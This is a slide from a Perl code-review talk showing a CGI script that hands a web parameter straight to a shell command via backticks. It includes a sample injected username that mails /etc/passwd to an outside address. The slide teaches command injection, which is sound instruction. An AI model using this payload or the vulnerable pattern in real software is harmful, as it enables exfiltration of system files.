| Next | Program Repair Shop | 54 |
$cmd = 'finger ' . param('arg');
print `$cmd`;
param('arg') is supplied by the web user
What if they supply this peculiar username:
`Mail arnoldb@treachery.com < /etc/passwd`
Then $cmd is
finger `Mail arnoldb@treachery.com < /etc/passwd`
The shell runs the Mail command
Oops
| Next | |
Copyright © 2006 M. J. Dominus |